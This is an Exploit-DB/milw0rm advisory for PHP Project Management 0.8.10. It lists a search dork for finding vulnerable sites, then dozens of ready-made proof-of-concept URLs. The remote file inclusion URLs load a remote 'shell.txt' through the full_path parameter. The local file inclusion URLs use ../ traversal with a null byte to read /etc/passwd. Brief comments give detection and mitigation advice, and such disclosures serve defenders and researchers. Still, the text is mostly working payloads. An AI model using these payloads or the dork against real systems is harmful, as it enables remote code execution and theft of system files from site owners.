PHP Project Management 0.8.10 - Multiple Local/Remote File Inclusions
Author: GoLd_M
type: webapps
platform: php
port:
date_added: 2007-10-20
date_updated: 2016-10-20
verified: 1
codes: OSVDB-41975;CVE-2007-5642;OSVDB-41974;OSVDB-41973;OSVDB-41972;OSVDB-41971;CVE-2007-5641;OSVDB-41970;OSVDB-41969;OSVDB-41968;OSVDB-41967;OSVDB-41966;OSVDB-41965;OSVDB-41964;OSVDB-41963;OSVDB-41962;OSVDB-41961;OSVDB-41960;OSVDB-41959;OSVDB-41958;OSVDB-41957;OSVDB-41956;OSVDB-41955;OSVDB-41954;OSVDB-41953;OSVDB-41952;OSVDB-41951;OSVDB-41934;OSVDB-41933;OSVDB-41932;OSVDB-41931;OSVDB-41930;OSVDB-41929;OSVDB-41928;OSVDB-41927;OSVDB-41926;OSVDB-41925;OSVDB-41924;OSVDB-41923;OSVDB-41922;OSVDB-41921;OSVDB-41920;OSVDB-41919;OSVDB-41918;OSVDB-41917;OSVDB-41916;OSVDB-41915;OSVDB-41914;OSVDB-41913;OSVDB-41912;OSVDB-41911;OSVDB-41910;OSVDB-41909;OSVDB-41908;OSVDB-41907;OSVDB-41906;OSVDB-41905
tags:
aliases:
screenshot_url:
application_url: http://www.exploit-db.comrelease-0.8.tar.gz
# PHP Project Management <= 0.8.10 Multiple RFI / LFI Vulnerabilities
# http://surfnet.dl.sourceforge.net/sourceforge/php-pm/release-0.8.tar.gz
# DORK : "PHP Project Management 0.8.10"
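# POC : RFI (remote file inclusion)
# Each script below appears to take its include path from the request parameter
# full_path, so a URL supplied there is included as PHP when the PHP configuration
# permits URL includes (allow_url_fopen / allow_url_include).
# Detection: full_path= carrying a URL in web server logs. Mitigation: set
# full_path server-side and never accept it from the request.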
# /modules/certinfo/index.php?full_path=http://localhost/shell.txt?
# /modules/emails/index.php?full_path=http://localhost/shell.txt?
# /modules/events/index.php?full_path=http://localhost/shell.txt?
# /modules/fax/index.php?full_path=http://localhost/shell.txt?
# /modules/files/index.php?full_path=http://localhost/shell.txt?
# /modules/files/list.php?full_path=http://localhost/shell.txt?
# /modules/groupadm/index.php?full_path=http://localhost/shell.txt?
# /modules/history/index.php?full_path=http://localhost/shell.txt?
# /modules/info/index.php?full_path=http://localhost/shell.txt?
# /modules/log/index.php?full_path=http://localhost/shell.txt?
# /modules/mail/index.php?full_path=http://localhost/shell.txt?
# /modules/messages/index.php?full_path=http://localhost/shell.txt?
# /modules/organizations/index.php?full_path=http://localhost/shell.txt?
# /modules/phones/index.php?full_path=http://localhost/shell.txt?
# /modules/presence/index.php?full_path=http://localhost/shell.txt?
# /modules/projects/index.php?full_path=http://localhost/shell.txt?
# /modules/projects/summary.inc.php?full_path=http://localhost/shell.txt?
# /modules/projects/list.php?full_path=http://localhost/shell.txt?
# /modules/reports/index.php?full_path=http://localhost/shell.txt?
# /modules/search/index.php?full_path=http://localhost/shell.txt?
# /modules/snf/index.php?full_path=http://localhost/shell.txt?
# /modules/syslog/index.php?full_path=http://localhost/shell.txt?
# /modules/tasks/searchsimilar.php?full_path=http://localhost/shell.txt?
# /modules/tasks/index.php?full_path=http://localhost/shell.txt?
# /modules/tasks/summary.inc.php?full_path=http://localhost/shell.txt?
# /modules/useradm/index.php?full_path=http://localhost/shell.txt?
# /ajax/loadsplash.php?full_path=http://localhost/shell.txt?
# /blocks/birthday.php?full_path=http://localhost/shell.txt?
# /blocks/events.php?full_path=http://localhost/shell.txt?
# /blocks/help.php?full_path=http://localhost/shell.txt?
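# POC : LFI (local file inclusion)
# The module, def_lang and m_path parameters appear to be used to build an include
# path without filtering "../". The %00 is a URL-encoded null byte, which older PHP
# versions treat as end-of-string, dropping any suffix the script appends.
# Detection: "../" or %00 in these parameters in web server logs. Mitigation:
# validate them against a fixed list of allowed names.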
# /modules/certinfo/index.php?module=../../../../../../etc/passwd%00
# /modules/emails/index.php?module=../../../../../../etc/passwd%00
# /modules/events/index.php?module=../../../../../../etc/passwd%00
# /modules/fax/index.php?module=../../../../../../etc/passwd%00
# /modules/files/index.php?module=../../../../../../etc/passwd%00
# /modules/files/list.php?def_lang=../../../../../../../../../etc/passwd%00
# /modules/groupadm/index.php?module=../../../../../../etc/passwd%00
# /modules/history/index.php?module=../../../../../../etc/passwd%00
# /modules/info/index.php?module=../../../../../../etc/passwd%00
# /modules/log/index.php?module=../../../../../../etc/passwd%00
# /modules/mail/index.php?module=../../../../../../etc/passwd%00
# /modules/messages/index.php?module=../../../../../../etc/passwd%00
# /modules/organizations/index.php?module=../../../../../../etc/passwd%00
# /modules/phones/index.php?module=../../../../../../etc/passwd%00
# /modules/presence/index.php?module=../../../../../../etc/passwd%00
# /modules/projects/index.php?module=../../../../../../etc/passwd%00
# /modules/projects/summary.inc.php?m_path=../../../../../../etc/passwd%00
# /modules/projects/list.php?module=../../../../../../etc/passwd%00
# /modules/reports/index.php?module=../../../../../../etc/passwd%00
# /modules/search/index.php?module=../../../../../../etc/passwd%00
# /modules/snf/index.php?module=../../../../../../etc/passwd%00
# /modules/syslog/index.php?module=../../../../../../etc/passwd%00
# /modules/tasks/index.php?module=../../../../../../etc/passwd%00
# /modules/tasks/summary.inc.php?m_path=../../../../../../etc/passwd%00
# /modules/useradm/index.php?module=../../../../../../etc/passwd%00
# milw0rm.com [2007-10-21]